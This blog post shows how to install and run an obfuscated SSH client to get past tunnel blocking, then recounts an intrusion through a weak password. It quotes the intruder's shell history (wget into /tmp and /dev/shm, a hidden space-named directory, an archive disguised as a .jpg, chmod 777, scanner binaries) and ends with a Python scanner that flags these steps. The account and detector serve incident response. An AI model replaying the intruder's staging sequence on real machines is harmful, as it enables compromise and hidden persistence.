Obfuscated ssh Client under Linux

SSH is a powerful tool, and not only for astronomers. We often use it to download observation data from the observatory's server or to run complicated programs on remote (overseas) servers. But, for reasons we all know, SSH tunnels are frequently blocked, so we need some technique to get past such blocking. Obfuscated SSH turns out to be an adequate method.

Below I describe how to use an obfuscated SSH tunnel under Linux:
(Original Code: Here)

INSTALLATION:

wget http://aenes.googlecode.com/files/brl-obfuscated-openssh.zip
unzip brl-obfuscated-openssh.zip
cd ./brl-obfuscated*
./configure  --prefix=/usr/local/newssh --sysconfdir=/etc/newssh
make
make install

Then you need to configure the ssh server following the guide here.

USAGE:
Then run the ssh client like this:

/usr/local/newssh/bin/ssh -N -v -Z ObfuscateKeyWord -p ***** username@hostname -D 127.0.0.1:7070

There are four parameters you need to specify: "ObfuscateKeyWord" is the obfuscation keyword you set in the server's configuration file (sshd_config), "*****" is the ssh server port number, and "username" and "hostname" are what their names say.

My First-Hand Experience of a Hack Attack

Just now I suddenly noticed something abnormal on the network (some unusual traffic), so I ran the who command and suddenly found that someone had logged in as the iraf user over ssh... It was all my own carelessness: I had actually given iraf such a simple password, and had ssh open as well. The result was that I suddenly found an IP, 95.77.21.239, logged in. I realised at once that I had been hacked. Then I looked up where the IP belonged, and it was Romania of all places... surely just a front. Based on the findings with a friend who is an expert, we determined that fortunately this hacker was not an expert... if he had been, my computer would long since have needed reinstalling. Then I looked at the shell history and found the following operation history:

wget
cd /tmp
chmod +x *
./bash
uname -a
 
wget
tar
cat /etc/issue
cd /dev/shm
mkdir "  "
cd "  "
wget ***; tar zxvf fb.jpg ; rm -rf fb.jpg ; cd fb ; chmod 777 * ; (for safety's sake, I have not posted the link)
./0-100 196
./100-200 196
cd /dev/shm
w
cd "  "
ls -a
cd fb
ls -a
cat log*
./100-200 196
ls -a
cat log*
./0-100 213
cd fb
cd /dev/shm
ls
cat /proc/cpuinfo
cd /dev/shm
./0-100 213
cd fb

After that, countless ftp_scanner processes appeared under my iraf user... Fortunately I discovered it in time... Then I reversed everything he had done, step by step... killed all of iraf's processes and deleted the iraf user... It is probably fine now, provided his activity stayed at the shell level. Let me remind everyone here to pay close attention to password management for Linux users and not be careless. My personal case serves as a warning.
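Added example, not part of the original post: a small Python scanner that runs over a user's shell history and flags the behaviours visible in the history above (staging in /tmp or /dev/shm, a directory named only with spaces, wget followed by tar, blanket chmod, numbered scanner binaries, basic recon). The sample history, the URL in it and the rule names are all constructed for this example.

```python
import re

# Constructed sample history, modelled on the indicators in the post above.
# The URL is a placeholder; the real link was deliberately not published.
SAMPLE_HISTORY = """\
cd /tmp
chmod +x *
./bash
uname -a
cd /dev/shm
mkdir "  "
cd "  "
wget http://example.invalid/fb.jpg; tar zxvf fb.jpg ; rm -rf fb.jpg ; cd fb ; chmod 777 *
./0-100 196
cat /proc/cpuinfo
ls -la /home
"""

# Detection rules: (hypothetical rule name, compiled regex), one per behaviour.
RULES = [
    ("exec-from-tmpfs", re.compile(r"(^|[;&|]\s*)cd\s+(/tmp|/dev/shm)\b")),
    ("blank-name-dir", re.compile(r'''(mkdir|cd)\s+["']\s+["']''')),
    ("download-then-unpack", re.compile(r"\bwget\b.*;\s*tar\s+[xz]")),
    ("mass-chmod", re.compile(r"chmod\s+(777|\+x)\s+\*")),
    ("bulk-scanner-run", re.compile(r"^\./\d+-\d+\s+\d+")),
    ("recon", re.compile(r"^(uname -a|cat /proc/cpuinfo|cat /etc/issue)$")),
]


def scan_history(text):
    """Return a list of (line_no, rule_name, line) for every rule that matches a line.

    A single line can trigger several rules (e.g. wget + tar + chmod 777 chained
    with ';'), so each hit is reported separately.
    """
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, pat in RULES:
            if pat.search(line):
                hits.append((n, name, line))
    return hits


def summarize(hits):
    """Count hits per rule so a reviewer sees which behaviours appeared at all."""
    counts = {}
    for _, name, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for n, name, line in scan_history(SAMPLE_HISTORY):
        print(f"line {n:3d}  {name:22s} {line}")
    print(summarize(scan_history(SAMPLE_HISTORY)))
```

Point it at a copy of ~/.bash_history (or the output of `who`/`last` pipelines adapted to the same rule table) to get a quick triage list; the rules are deliberately narrow and will not catch an attacker who renames or reorders these steps.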